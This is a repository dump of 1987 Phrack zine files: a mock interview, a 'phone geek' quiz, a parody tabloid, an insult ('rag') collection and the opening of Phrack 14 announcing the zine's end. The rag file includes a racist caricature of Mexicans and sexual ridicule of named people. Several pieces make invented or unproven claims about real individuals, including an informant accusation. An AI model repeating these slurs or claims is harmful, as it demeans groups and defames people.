some excellent chees......
ME: No thank you. Back to the question, are you really a Prime expert?
HIM: Well, I, uh...I guess you could say that. Have you ever read my Prime...
ME: No I havent. Sources tell me that you have claimed you had system access
on the Henco Prime on Telenet. But my sources know for a fact that you
haven't. Is there any truth to this?
HIM: Well, no...
ME: Thats what I thought. Also, I would like to bring up the little war
between you and Evil Jay. You have claimed that the reason you didn't
see eye-to-eye was because both of you were working on seperate versions.
Yet, we both know that aside from versions lower than 19 there are
not too many changes so we really dont understand your comment.
HIM: What kind of interview is...
ME: We also understand that you posted a message on Phantasie Realm that
contained the, and I quote, "new 617 Cosmos dialups". Yet these dialups
have been around for years and died more than a month before your post.
Any comments, Codes?
HIM: I....
ME: Okay, how about your "Real Hackers, Phreakers and Trashers Guide".
You made some interesting comments on there, such as, "Real phreaks are
mostly pirates" and "Real phreaks dont have handles like Mr Phreak".
You obviously didn't take a look at your own handle, but we will skip
that little misunderstanding. The thing we find curious about the file
was that it was written in January of this year (1987). At this time, you
were a member on some respectful systems, such as Shadowspawn. What we
cant understand is why a phreak, who is on some pretty good boards, would
write such a rodentish file. Comments?
HIM: You know how I feel about rodents. (HE glances fondly at Mickey portrait)
ME: I see. How long have you been hacking a phreaking?
HIM: Uh, about a year or les...
ME: I see. Is it true you were an infamous TMC code poster last summer,
sometimes posting up to 30 TMC codes per message, but never anything else?
HIM: HEY, NOW WAI...
ME: I see. Isn't it true that the majority of your posts since you have been
accepted on some major boards, have been advertisments for your somewhat
faulty Prime hacking files?
HIM: You have to advertise nowadays to get any recognition for anything.
You know?1
ME: Well, isn't that special. We got a chance to see your application to
Atlantis, and noticed that you said you had experience with Vax/VMS, RSTS
and some other operating systems. But close sources who know you well
tell us this is a lie, and if you did know anything its probably how to
get a directory, chat with a user and other general crap. Is this true?
HIM: WHAT THE HELL KIND OF INTERV...
ME: Well thats about it for today. Thanks alot Codes Master. May the force
be with you.
HIM: WAIT A...(He starts to grab the interviewer...to Codes amazement, a mask
falls off and...)
HIM: EVIL JAY?!?!1
ME: Thats right! We have you on tape now buddy. Your life is ruined...
The rest is to graphically violent to show here. But Jay emerged unscathed
to hand us the copy of this interview. Codes was last seen walking towards
Katheryn Hamilton Mental Center and had no comment.
So, we have unraveled the mysterys of one of the greatest posers of our
time and exposed the man to what he really was all the time. A mouse.
A fiendish poser, seeking to infilterate the higher levels of hacking and
phreaking, for his own greedy amusement. Everything in this article was
true, and we advise sysops to think twice about admitting Codes "Mighty
Mouse" Master on your bulletin board system. Thank you and have a nice day.
-Tom

177
phrack13/7.txt Normal file
View file

@ -0,0 +1,177 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #7 of 10
ARE YOU A PHONE GEEK???
-----------------------
Take this simple test to find out! A word of caution however...This file
is not a measurement of your intelligence or sex appeal. Read on at your own
risk!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Simply answer the following questions completely and truthfully.
1: You are out on a date with an amazing looking chick. You are at a drive
in and notice that she is getting rather hot. She wraps her arms around you
and lets you know she means business by her passionate pelvic thrusts. However,
you lose concentration when you notice a Bell truck has pulled in next to you,
and the driver is asleep (boring movie). What do you do???
A: Push your girlfriend away and sneak out the door quietly, in hopes of
scoring on countless hard to get goodies such as lineman's tools, test sets,
manuals, and telephone numbers to engineer.
B: Give her the end of a soda bottle and tell her you'll be right back.
C: Ignore the silly Bell truck and continue with your date.
-------------------------------------------------------------------------------
2: You are in the middle of town. It is cold and raining. You have sneaked
out of your house to the local fortress to conduct some experiments.
When making a call to your fave LDS, you hear an MF routing! What do you do?
A: Continue your call as normal, making a mental note of the occurrence.
B: Quickly hang up and repeat the procedure in the same fashion, in hopes
of getting the routing again, so you may memorize it and post about it.
C: Talk in whispers and glance over your shoulder for Bell security and FBI
vans coming your way.
-------------------------------------------------------------------------------
3: You are in your school's office for disruptive behavior and notice that
they're having some difficulties with call completion. What do you do?
A: You jump up and investigate the source of the problem, calling various
test numbers while you're at it, performing a full battery of tests upon the
line.
B: You grab the phone and dial the repair service, going into a long
technical discussion on bandwidth limitation properties upon PBX type systems.
C: You don't give a fuck and let the bastards figure it out for themselves
since they're the ones who are punishing you for pissing in the corner of the
study hall.
-------------------------------------------------------------------------------
4: You've had a little too much to drink and aren't driving well. Suddenly,
a telephone pole appears in front of your car. You have a head on collision.
You feel blood dripping from the gash in your forehead. What do you do?
A: You climb out of your smashed car and decide to climb the pole and
investigate the aerial distribution box for possible notes left by linemen.
B: You whip out your notebook and take note that there is a can up there
and put the note away for future reference. You then go to the hospital.
C: You wail in dismay that you might have forgotten your new codes in the
trauma.
-------------------------------------------------------------------------------
5: You are on your favorite BBS when you see some loser asking questions
about tracing. What do you do?
A: You ignore the question because you're too elite.
B: You rag the user on every sub boaoard and in mail because ESS DOES
trace you when you make too many calls to the same number.
C: You leave the user twelve pages cpied directly from a manual about
the call trace procedure along with some personal comments on how Bell puts
DNR's on lines if the words 'phreak', 'hack' or 'code' is spoken over it.
-------------------------------------------------------------------------------
6: Your mom picks up the phone during a conference and overhears someone
harassing a DA supervisor. Later she asks you about it. What do you do?
A: Say 'Mom, I know you're not going to believe this, but there's a new
company that connects you to a pre-recorded phone conversation for a nominal
users fee.'
B: Say you don't know who it was but then contradict yourself later by
talking about how neat it was to hear Pee Wee abuse a DA supervisor.
C: Get violently sick and leave the room.
-------------------------------------------------------------------------------
7: You have a little static on your telephone line. What do you do?
A: You call up your CO and lodge a formal complaint, branding the personnel
as lazy, inefficient, and decadent, telling them how much of a better job a
true telecom buff like yourself could do.
B: Call your local tone sweep to see if Bell is tracing your line.
C: Hide under your bed until further notice.
-------------------------------------------------------------------------------
8: Your CO is having open house. You plan to go with all enthusiasm, when
you hear that Cindy, whose body measurements are 36-24-36, is having a 20 keg
party with no cover charge. Cindy has expressed deep lust for you within recent
weeks. What do you do?
A: Telephone Cindy covertly from your CO where you are taking the tour and
tell her you're sorry, you can't make it, but you have some great new numbers.
B: Dress in a ninja suit and sneak into your CO through a window.
C: Rush straight to Cindy's to find out that her new 6 foot 10 boyfriend
is supervising the fun and games.
-------------------------------------------------------------------------------
9: You go to a shopping mall where there is a demonstration on a new AT&T
phone. The speaker mentions telephone switching for a brief moment. What do
you do?
A: Run to the nearest restroom and relieve the tension in your bladder.
B: Push your way to the front of the crowd of telephone illiterates and
begin a heated debate on switching systems and analog to digital conversion.
C: Whip out your note pad and remove pencil from behind ear to take notes.
-------------------------------------------------------------------------------
10: You wake up in the morning. What do you do?
A: Forage into your box of trash for interesting tidbits that you may have
missed last night.
B: Pick up the telephone and take reassurance that the Telco hasn't turned
off your dial tone yet.
C: Admonish yourself for forgetting to set the MF routing as your alarm
clock the night before.
-------------------------------------------------------------------------------
For each question that you answered A on, give yourself 5 points. For each
B answer you gave, give yourself 3 points. For each C Answer, give yourself 1
point. Now go back and add up your totals on your handy dandy pocket calculator
and see how you have tested in the G.I.Q (Geek Ignorance Quotient).
50 points and above- You are fucking a amazing, and not just elite, not just
super elite, but super amazingly elite!!!! Pat yourself on the back a few hun-
dred times, you deserve it.
30 points and above- You are not quite as fucking a amazing as those in the
above category, but you're close behind. Keep up the good work and soon you'll
be hearing from the GIQ League!
10 points and above- You are rather sad, because if you haven't realized that
this point scoring system is inaccurate and inefficient, not to mention mathe
matically incorrect, then you should stick to watching Scoody Doo reruns
instead of wasting your time trying to be elite, which will never happen anyway
to anyone who had the ingorance to put up with this worthless exam up till now.
HAHAHAHAHAHAH!!!!!!! L0ZER!!! YOU JUST WASTED A GOOD PORTION OF YOUR TIME
READING THIS, BECAUSE YOU THOUGHT IT WAS GOING 2 BE SOMETHING G00d!!!!!!!HAHA
DAMN I'M ELITE&!$"%"C$"!$!#!3223
-------------------------------------------------------------------------------

170
phrack13/8.txt Normal file
View file

@ -0,0 +1,170 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #8 of 10
%%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%%
% + + %
% Phrack Presents... %
% %
* Computerists Underground News-Tabloid *
% By Crimson Death %
% %
% + + %
%%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%=%%
Welcome to the first issue of Computerist's Underground News-Tabloid. Now,
I am sure you are thinking, "aren't 'news' and tabloid basically synonymous?
Isn't that a bit redundant?". Hell, YES! It is! But "we" don't care. Names
don't mean a DAMNED thing to us! Hell, NO! What we care about it NEEEEWS! Hard-
core, FACTUAL news. That's why we tell it like it is. All Bullsh-t aside. You
don't like what you're seeing? Don't read it! These are the "Bob"-damned facts,
buddy. This is a tough world we live in. Things aren't always as pretty as we'd
like them to be. It's a Dog-Eat-Dog world. If you can't take it, you won't make
it, and it's as simple as that. So read and learn! It's OUR world, and only WE
can change it, so keep informed!
Editor-in-Chief
Crimson Death
-------------------------------------------------------------------------------
DREADFUL DIGITAL DILEMA
"IT'S TRUE!", say top scientists at South Hampton Institute of Technology,
"Within three years, the world will face its worst dilema in ages." A new
strain of virus called C-AIDS (Computer/Artifical Intelligence Deficiency
System) will begin attacking micro-chips around the globe.
Where is it coming from? Scientists aren't quite sure, but believe it to
be a combination of many industrial waste products that float around in the
air, and human virus! How can this be? Well, that is uncertain right now.
Dr. Harry Koch claims, "We just don't know, but it's comming!" Religious
groups claim it's a sign from God to "slow down". Our resident psychic believes
it's a plague sent down by aliens to hinder us in catching up to their
technology.
Just what will this mean? The downfall of many businesses, government
problems, stock market crash, media troubles! You name it! Almost everything is
run by computers these days. The world will be in shambles. Barbarian times
will set in! People will start using their minds! Something needs to be
done, and QUICK!
-------------------------------------------------------------------------------
QUICK QUOTES
"IT'S TRUE," says:
Line Breaker, "I ran a Commodore 64 BBS with 100 megabytes of storage!"
American Telephone and Telegraph, "Our rates really ARE the cheapest!"
The Traveller, "My Jackin Box plans work! You just play with the little lever
until it pops up!"
Cheshire Catalyst, "I did play Shaggy on Scooby Doo...but, hey, that's all in
the past now!"
-------------------------------------------------------------------------------
ROBOT CLONE SEEKS PHREAKS AND TRACKS HACKS
"IT'S TRUE!", say our inside sources, "Bell Telephone Labs is currently
working on a high tech robot to seek out Phone Phreaks and Hackers. I have seen
one...they're almost life like, and it's scary!"
Right now, there are only a few, but BTL plans to soon put them into mass
production. This means Bulletin Board Systems throughout the U.S. will be
teeming with these undercover agents. Two known NERD's (Neurologically
Enhanced Robotic Detectives) are John Maxfield, a Detroit based android running
a business called Board Scan; and Daniel Pasquale, a former officer of the law,
located in California.
How can we protect ourselves? Well, we're not quite sure, but our
resident scientists are working on it now!
More on this topic as it unfolds.
-------------------------------------------------------------------------------
Latest news on Robot Clones: Rumor has it that N.E.R.D., John Maxfield
has contracted a premature case of C-AIDS. If asked, he only denies, but an
inside agent of ours at BTL said that he has been coming there for treatments.
-------------------------------------------------------------------------------
FAMED PHREAK FATHERED BY FUZZIES
"IT'S TRUE!", says a close friend of Scott Ellentuch (better known as
Tuc) the sysop of RACS-III BBS, and former co-editor of Tap Magazine. "He
doesn't like to talk about it, but he was infact raised by a pack of male
Guinea Pigs!"
At the tender age of three months old, the sibling Tuc was abandoned on
a doorstep in Manhattan. Unfortunately for the tot, the owner of the house was
an old druken man, who threw the poor baby into the trash before his wife got
home and found it. Luckily, a pack of wandering Guinea Pigs were on the hunt
for food, an happened upon the child. They then took him to their nesting in
Central Park, and raised him like one of their own.
One day, at the age of 10, Tuc was apprehended by the police after being
caught shopplifting a bag of cedar chips at a local pet shop. It was decided
in court that he was a not a criminal, but just misguided because of his fate.
He was then put in an adoption home until taken in by the Ellentuch's.
A crack reporter of ours decided to seek out these kindly rodents, and
ask about any grievances they may have about little "Zippy" (the name given
to him by his furry brothers). When questioned, they only replied with a
squeek, and left a few dung pellets. I suppose that's their way of saying,
"Come on back, Zip, we miss ya..."
-------------------------------------------------------------------------------
NEW PHREAK KLASS CO-SYSOPED BY DEMON FROM HELL
"IT'S TRUE!", says respected Demonologist, Dr. Jack Goff, from Hawaii
State University, founder of the Academy of Supernatural Studies. "A modem
user, who dons the handle 'The Executioner' has been possessed by an evil
demon from the netherworld!"
The Executioner, of New Jersey State, co-sysop of the revived Phreak
Klass 2600 (ran by The Egyptian Lover), and the 'Leader' of the also-revived
PhoneLine Phantoms, was "once a nice person", according to many of his old
friends. What caused his plunge into the sadistic-egotistical world he now
lives in? Black magick!
His mother spoke with us. "Ever since he ate that bad can of Spaghettios,
you know...the ones with the sliced franks, he hasn't been the same.
Day-by-day, he gets worse-and-worse. It's like living with...a...a...monster!"
At that point, the poor woman broke into tears. But, she couldn't have been
more on the money if she were sitting on it! The truth is, while eating a plate
of those Spaghettios (you know, the one's with the sliced franks in them),
he was reading out of a book he bought the week before called "101 Ways to
Summon a Demon". Thinking it was all a bunch of nonsense, he read one of the
'prayers' aloud. From then on, the poor boy has been inhabited by the demon,
Isuzu.
Sorry to say, Dr. Goff claims this demon is a "one of a kind". So far,
there are no known ways to Ex-orcise (pun intended) the dreaded Isuzu. "It's
a shame for the lad...I guess we will have to put up with his sadistic, ego-
tistical, obnoxious, rude, loud, ragging posts and attitudes for awhile."
-------------------------------------------------------------------------------
SCIENTIFIC STUDIES SHOW...
If you put an infinate number of Taran King's in a room for an infinate
number of years, you probably still couldn't get Metal Shop Private to stay up
for over 30 days.
-------------------------------------------------------------------------------
LOD/H MEMBER DISMEMBERS MEMBERS
"IT'S TRUE!" says an anonymous member of the 'Modem World', "Until now,
it has been all hush-hush, but in reality, there are only a couple LOD/H
members alive today...it's frightening, and it's hard to believe, yet it
happened."
Just what did happen you ask? What is the truth behind the drop-out of
many LODers? How come the group has dwindled to a petty few? Murder! Yes, cold-
blooded throat-slashing MURDER! "Who? How? Why? ", you say? Well, that's what I
am here for, and that's what you're going to find out.
In December of '86, an LOD/H meeting was held at The Mariott, in
Philadelphia, in which all of the members had attended. During a discussion on
the current MCI cracked-down, someone said, "Hey, let's pause this conver-
sation for 30 minutes, 'Punky Brewster' is coming on." It was at this point
that everyone in the room quieted, and The Videosmith stood up and threw a
glass of Pink Lemonade at the TV. He then ran out of the room yelling "Fuck
this shit! It all makes my balls itch!" Moments later he returned with a 17
inch machete, and a can of Raid. He had shaved his head, and was wearing a
shirt that said, "Buckwheat say 'Drugs NOT O-Tay!'" He was obviously deranged.
He proceded to spray everyone's hair with raid, until the can finally
ran out. As the group stood in awe, he slashed all of them into tiny bite-
size pieces...one by one. He then sat down, and watched the rest of Punky
Brewster, and to this day, has no recollection of what had happened. Only
those few, who had been at Denny's at the time, remained.
Following this massacre, he was treated at the Jason Voorhees Institute
for the Criminaly Insane, and is no longer a member of LOD/H.
-------------------------------------------------------------------------------
Well, that about raps it up for the first issue of the Tabloid. There may
be a few more in the future, I am not sure at this point right now. I hope you
all enjoyed it, and that only AT&T, The Traveller, and Line Breaker were of-
fended.
I'd like to have some comments on how you felt about it, so let me know.
Also, let me know if you figured out all of the puns and acronyms.
-------------------------------------------------------------------------------
Call these Awesome Boards:
Lou's RBBS.................215-462-4335 Sysop: Louis Acok
Grendel's Liar (sic).......415-679-2600 Sysop: Stan the Man
KKK-Kool BBS...............404-343-5397 Sysop: Kurt Waldheim

423
phrack13/9.txt Normal file
View file

@ -0,0 +1,423 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #9 of 10
[+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+] Rag [+]
||-----------------------------------------------------||
|| ||
|| ______The Executioner______ ||
|| PHRACK XIII| |PHRACK XIII ||
|| ------------ Thanks: Knight Lightning ------------ ||
|| |PHRACK INC| The Phreakazoid! |PHRACK INC| ||
|| --------------------------------------------------- ||
|| | | ||
|| | Phreak Klass |The Best of Sexy-Exy| Phreak Klass| ||
|| | 806-799-0016 |--------------------| 806-799-0016| ||
|| | EDUCATE |(c) 1987 Sexy-Exy TM| EDUCATE | ||
|| | | | | ||
|| | | Released April 1 | | ||
|| | | ||
|| --------------------------------------------------- ||
[+]]]]]]]]]]]]]]]]]]]]]]]]]]RAG[[[[[[[[[[[[[[[[[[[[[[[[[[+]
Welcome to "The Best of Sexy-Exy", a conglomoration of
rags/insults that have been gathered over the past year or
so. All rags are original and are the creation of my genius
mind. I think that this installment is appropriate for the
13th issue of PHRACK.
NO rags are to be taken seriously, they are merely for
entertainment.
There have been events beyond my control during the
process of writing this file, they are enclosed in "**".
Thank you.
============================================================
"Doc Holiday: The man, The myth, The Loze"
Doc Holiday is a man of many diverse talents. I think it's
my place to let the whole world know just how much of a
mental giant he is.
------------------------------------------------------------
First, let's discuss how he manages to engineer the toughest
of AT&T's network men. Here is a typical conversation
between Doc and AT&T. I will interject my comments in
between the brackets [ and ]. Doc will be represented by a
DH.
<RING>
AT&T: Hello, AT&T directory assistance, may I help you?
[Boy, this guy is a REAL powerhouse to engineer,
think MAYBE Doc will be able to get anything from
him?]
DH: Hi, this is Pee Wee Herman from Illiois Bell, DA waste
removal. I am having a problem connecting an inter-
office call, do you think you could give me the number
to the SCC in area code 201?
[Gee, he picked a REAL important reason to call didn't
he?]
AT&T: Well, sir, I don't think I can do that, I can give
you the number for the business office, maybe they can
help you. (AT&T thinks: bahehahhe, stupid kid).
<RING>
NJ BELL: Hello, New Jersey Bell, all operaters are busy now,
please hold, and your call will taken in turn.
DH: Ho hum...[unzips his pants]
NJ BELL: [Elevator music]
DH: ahhhhh...[Doc, why is your left hand having spasms?]
NJ BELL: Hello, New Jersey Bell, this is Susan.
DH: Uh, yeah, hold on a sec...[wiping away the fluid from
reciever.]
DH: Uh yeah, this is Dick Little, from Illinois Bell, I was
wondering if you could give me your 201 CN/A?
[Uh, Doc, hate to break this to you, but 201 has
no CN/A.]
NJ BELL: Uh yeah, hold on...
[NJ BELL: Must be one of those trainees, they have
to get because of affirmative action.]
NJ BELL: I'm sorry, I can't give you that number.
DH: Well, here in this small town, it's kinda hard to get
around, so could you please give me someone I can refer
to?
[At this time, Doc's dog wanders into his room, and
begins to bark and snarl and generally acts like
Doc's mom.]
DH: Uh, y'know, this town is SO small, you can hear the dog
barking across the street. [Wow, fast thinker]
DH: I'm not used to this small town, I'm used to a big city.
NJ BELL: Oh, what town are you in?
DH: Uh, it's this little town outside Illinois.
[Hmm, he's supposed to be from Illinois Bell but he is
not in Illinois? WHAT AN ENGINEER!!!]
NJ BELL: Oh, is that so. [NJ BELL: Damn kid should at least
know his geography.]
NJ BELL: What big city did you live in before?
DH: Oh, I used to live in New York City.
[Sure, Doc, you got your MASSIVE southern drawl in the
boro of Brooklyn...]
DH: I mean, uh, I only lived there for 3 months.
[Give up Doc, you screwed up big time, you're gonna
get pounded.]
[FLASH: Doc's mom gets on the phone.]
Doc's Mom: ROB, TIME FOR YOU CELLO LESSON!!!!
DH: Yeah, uh, well, my seceratary, has just reminded me that
I have to pick up my kid for his music lesson.
NJ BELL: <chuckle> Sure, <growing giggle> I guess I will
talk to you later <crescending into hysterical
laughter, falling off his chair in a spasmodic
echo of immense laughter>.
<CLICK>
Boy, Doc, I gotta hand it to you, in that conversation, you
sure showed him your intellegence. It's ok, that you don't
know where you are, and it's ok that your mom interrupted
you twice, barking both times into the phone. But, hey,
I am not done celebrating you yet, here's more of "The Story
Of Your Life!"...
** The date is now March 14, Doc Holiday has just been put
out of action by Oryan QUEST, shutting off both of Doc's
lines. **
** The date is March 30, I have just heard that Doc has been
busted for COSMOS hacking. **
------------------------------------------------------------
TOK, Tribunal of Knowledge, is a group to be admired,
they're conglomoration of massive intellegence and
normality have all of the phreak/hack world stunned.
Prophet's education at Devry Tech, you know the school where
you get a free box of tools when you enter, is a definate
school for those who have superior mental ability. And then
there's Solid State, or by name, Nate. By the way, do you
know what the name Nate means? Let's look in the Websters
Collegiate Doctionary...
NATE \NAT\ n : skin that stretches from the base of the
scrotum to the opening of the anal cavity.
Boy, Nate, your parents must have loved you...
And I haven't forgotten you, High Evolutionary, you massive
stud you. HE, is on the school football team. [Actually, he
plays text-graphics football on his commodore and thinks he
plays football, but we'll let him have his fantasy.]
Here is my tribute to T0K!1!
TOK! Second Chapter: Nothing this bad ever dies.
------------------------------------------------
We're TOK and we're proud to say,
Even Buckwheat says that we're O'Tay!
We're gonna make LOD jealous of us,
With our computers we get from Toys R Us!
We'll take the hack world by attack,
With our 100+ files we put in Phrack.
Our reformed group numbers only to three,
We'll be famous like Larry, Moe and Cur-ly!
Hey TK do a prophile on us, we want some press,
We'll tell ya about our hobbies like playing Phone chess!
Ask us about our ability and we'll gladly exposulate,
About the great acomplishments of Solid State!
And Prophet too, boy is he a Joe Hacker,
He talks to Bill Landreth, aka The Cracker.
He spits out logins and passwords all the time,
Getting busted by feds is his favorite past time.
Then there's High Evolutionary, the leader of the pack,
Who does his hacking in a neighbor's tool shack.
He likes to hack Unix's, VMS and The Source,
He likes to play football, on his computer of course.
We're elite, we're the best there will ever be,
We're just jealous that we're not in cDc.
** The date is now March 21, I have just learned that Evil
Jay and Ctrl-C have been added to the list of TOK
groupies.**
------------------------------------------------------------
Dr. Doom Rag, the extended dance version to the tune of
"Beverly Hillbillies".
Now, listen to a story about a boy named Doom,
Poor modem geek who would never leave his room.
Then one day he was talking on the phone,
When up in his pants came a miniature bone.
Penis, that is, kinda like a toothpick.
Well the next thing you know ol' Doom puts up a board
He runs it on a Commie 'cause it's all he can afford.
He makes his board private and he thinks he is a phreak,
<Idea Block...sorry>
------------------------------------------------------------
I have seen alot of files written lately and needless
to say, alot of them need a lot of work. Sooo in my infinite
charitableness, I ha ve decided to write a file on how to
write a file. I will list EVERY IMPORTANT aspect of writing
a file and all the inside secrets on how it will make you
look a like a real cool dude (Let's face it, we write files
to promote ourselves.).
The first and most important thing to writing a file is
your border. It has to be flashy and must include the name
of your k-kool group which you are part of even though no
one in the group helped you but you will still put their
name down to promot e yourselves. Of course, the title must
be set in it's
own section of the border.
Example
-------
[$%$]\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\[$%$]
\===/ \===/
[+] Metro! =->Dr. Doom<-= Metro! [+]
$$$ ------ -------- ------ $$$
%^% (^name of group) (name must be %^%
(0) emphasized) (0)
*#* *#*
RAD Present: RAD
|+|(always use 'present') |+|
::: :::
@!@ File #30 > ISDN!!!!!!!!!!! @!@
%!% %!%
%!% (ALWAYS say how many OTHER worthless files %!%
%%% you have written so it makes you look %%%
||| productive) |||
[$%$]//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//[$%$]
That is an example of a good border, notice all
the neat ASCII graphics and how he uses space to put
his group in the file too.
The content of your file is important also.
Here is a list of rules you should follow.
1. ALWAYS be confusing, it makes you look li ke you
know what you are talking about, even if you don't.
2. ALWAYS use as many acronyms as you can, it will make
your reader look up to you because you know that
AACTU stands for Acronyms Are Cool To Use.
3. ALW AYS be condescending to your reader as if he/she
should know what the hell you are talking about even
if you are just rambling to fill space.
Corollary: ALL FILES SHOULD BE AT LEAST 40 SECTORS
4. ALWAYS give 10-15 examples that really don't show
what you are talking about, but will make the reader
think that whatever you are writing on, somehow has
some use when it doesn't.
5. ALWAYS put in diagrams and pictures, the ASCII will
confuse them so much that you can say just about
anything that will describe the diagram.
6. ALWAYS list things vertically, it makes you look
professional. (And it takes up space too)
7. ALWAYS thank 10 famous people even if they didn't
help you on the file because it will make it seem
as if you know them REAL well.
8. ALWAYS interject your own opinions because it makes
you look scholarly and that you are a master of the
facts you are perpetrating.
9. ALWAYS make at least 5 spelling mistakes, because it
makes it seem as if you did it in a hurry because
you have a social life, even when you don't and
spent days on it correcting spelling and grammar.
10. ALWAYS type stuff like jkwhebfiue in parts you don't
fully understand and then blame it on the xmission.
This releases you from knowing everything in the
file.
11. ALWAYS dedicate your file to a girlfriend, it makes
you look like you have one and that you are a stud,
even if you look like Slave Driver.
Sexy-Exy presents...
A Humor Filled Article
A Marvelous Laugh For The 80's
A Nice Bedtime Story
A Stephen King Look-a-Like
A Joke for You!
"When a Phreak/Hacker says...He really means,,,"
Preface
=======
Just a note, all names mentioned are fictitous, and are
creations of the author. Any resemblences or factual
similiarity are completely coincidental.
When a Phone Phreak or Hacker says something, there is
usually an undertone or subliminal message, in this nice
file, I will list some of the more common ones you will run
across.
1. When Slave Driver says
'I am on the football team!'
He really means...
'I wash the uniforms for the guys.
2. When Carrier Culprit says...
'I look like Don Johnson!'
He really means...
He watches too much 'Miami Vice'.
3. When Knight Lightning says...
'Hi this is KL, I wanna ask you something...'
He really means...
'Hi, this is KL, let me open up my Database.'
4. When Phantom Phreaker says...
'I go trashing for all my information.'
He really means...
'I am going to shop for Christmas dinner.'
5. When Dr. Doom says...
'I got locked out of my house.'
He really means...
'The Dept. of Sanitation put the lid back on the sewer'
5. When Forest Ranger says...
'I am tenderizing meat.'
He really means...
'I am popping my zits.'
6. When Line Breaker says...
ANYTHING
He really means...
'I am lying to cover my stupidity.'
7. When Silver Spy says...
'I am God at the VAX/VMS.
He really means...
'I work with a VAX, so I am not that impressive.'
8. When Evil Jay says...
'I am into Heavy Metal.'
He really means...
'I have no friends and bang my head in frustration.'
9. When The Rocker says...
'I love to party.'
He really means...
He watches Animal House and thinks he can party.
10. When Mark Tabas says...
'I have an athletic family.'
He really means...
'Me and my little girlfriend are running
away from EVERYBODY.
11. When Captain Hooke (Howie) says...
'Hey man, I am gonna fuck up your dad's credit card on
TRW!'
He really means...
'I spend too much time talking to Line Breaker.'
12. When Captain Hooke (Howie) says...
'I have a major social life.'
He really means...
'I call up the conference bridges and spend all of
my time talking to losers.'
13. When Dr. Who says...
'I have done alot for the Phreak/Hack world.'
He really means...
'I try everything first to see if it's safe.'
14. When Forest Ranger says...
'Telecomputist will be an original magazine full of
new information.
He really means...
'Telecomputist is written on toilet paper with
the same quality and originality of articles'
16. When Attila the Hun says...
'I love to Slam Dance!'
He really means...
'When he's in a ballroom he steps on EVERYONE'S feet.'
17. When Ax Murderer says...
'Yo, I just wrote the most complete file on UNIX with
examples.'
He really means...
'I rewrote a Unix manual and copied the illustrations
too.'
18. When Taran King says...
'Yo, MSP is down due to Hard disk problems.'
He really means...
'I spilled dinner over the computer chatting with KL.'
19. When Sinister Fog says...
'I used to run the best bbs in the country.'
He really means...
'We tried to find the non-existant alogarithm for SPC.'
20. When Oryan Quest says...
'I am gonna bill $20000 to you Taran!'
He really means...
'PLEASE let me back on Metal Shop!'
21. When The Executioner says...
'Yes, Taran I will have your file in time for Phrack.'
He really means...
'I fucked up again and I'll have to get Bill to help me
out.'
22. When Bill From RNOC says...
'Hey, what's up?'
He really means...
'I'm here to leach all your new stuff, pull your tolls
and stab you in the back.'
=============================================================
ORYAN QUEST - A point by point historical recreation of this
controversial excuse for recycled shit from
the sewer of Mexico.
"Juan!!!", screamed the mexican lady, "get over here,
mucho expresso!"
"Coming my little tortilla!!", panted the tired Mexican peasant.
"What is it my little bag of cabbage leaves?", inquired
the Hispanic mongrel.
"Juan, Juan, Juan, I tink I am stricken with baby!"
exclaimed his wife.
"OH NO! my babaloo!, not another little child," cried
Juan, "We cannot afford to have another child."
"My wages picking coffee beans and stripping cabbage
barely feed our other 12 children, how am I going to support
THIS bastard billy-goat?", asked Juan.
Well, the day finally came, and the poverty stricken
couple made their way to the village hospital, by way of
mule, a mercedes to the couple.
"Oooooooooh....", cried the lady in pain, as the baby
pushed it's way forward.
"Ohhh what a beautiful child", exclaimed Juan.
"Uh senor, that's the pre-natal discharge, your baby is
next.", corrected the doctor.
The baby's body began to appear(feet first, of course),
it's WIDE vertical smile, greeting the world.
"Oh my,",said Juan,"he looks just like his papa!"
"I must give him a proper name.", continued Juan.
"I name you..
Senor Pepe Guadaloop Tom Flanagan Paco Oryan QUESTO!"
[Pretend there is alot of applause]
Well, Paco, I mean QUEST, learned the trade of his
father and his father's father. Toiling and slaving away, he
dreamed of one day going to America, north of the border,
and leading a life of a re-fried bean.
One lazy sunny day, Paco and his father were doing
their daily fishing, trying to make a living for themselves
and feed their family,with out eating stray dogs. Questo was
casting off with his new hardwood fishing pole that his
father made for him that very morning. Juan was picking his
nose and batting an eye at his son, marveling his skill at
throwing the line.
Suddenly Paco's line went taut with a quick jerk and
Paco's limp 100 lb body flew into the water with a splash.
"Oh no, my little chili bean fart, what should I do.
Juan pulled Quest out of the water. Well, he thought "At
least he's clean now, I don't think he'll be thirsty for at
least another week.
[Sorry to end this story so abruptly, but Oryan Quest is
not worth more than 5K, come to think of it he's not worth a
byte. I figgured since he tried SOOOO hard to write a rag
file about me (See Phrack 12) that I ought to show exactly
what the word, "rag" means.

50
phrack14/1.txt Normal file
View file

@ -0,0 +1,50 @@
==Phrack Inc.==
Issue XIV, File 1 of 9
Released On July 28, 1987
Hi and welcome to the final regular issue of Phrack Newsletter. Most of you
already know about the nationwide arrest of many of the phreak/hack world's
most knowledgeable members. I may receive a visit from the authorities as
well and because of this and other events, I am going to leave the modem
world.
As of now, Phrack Inc. is dissolved. It may put out an annual publication
once a year in the summer, but this is only a possibility. If I remain a free
person, I will be able to release Phrack XV which will only be news and it
will feature details about Dan The Operator, PartyCon '87, and, of course, the
current Secret Service bust wave.
One last thing to mention. Although I don't have the time to go into full
detail about it right now, at the current time, we at Phrack Inc. have
uncovered a large amount of evidence to support the conclusion that MAD HATTER
is an informant. He should be deleted off of any BBSes that he calls. We
believe that he was planted by the Secret Service to infiltrate PartyCon '87
and frame Control C and many others.
One last statement to make before the directory. Basically, I have wanted my
escape from the phreak/hack world for a long time. I figured SummerCon '87
would be my last big thing and then I'd write the article for PWN and by July
1, 1987, I would be done and out of the modem community. Unfortunately,
events just kept happening and are still in motion. Even if I am not busted,
as of August 1, 1987, I am considering myself not a member of the modem
community and I will not appear anywhere. If Phrack XV isn't out by then, you
won't see it ever. I'm sorry, but that's the way it has to be.
This issue features:
Introduction by Knight Lightning . . . . . . . . . . . . . ..012 Apple Sectors
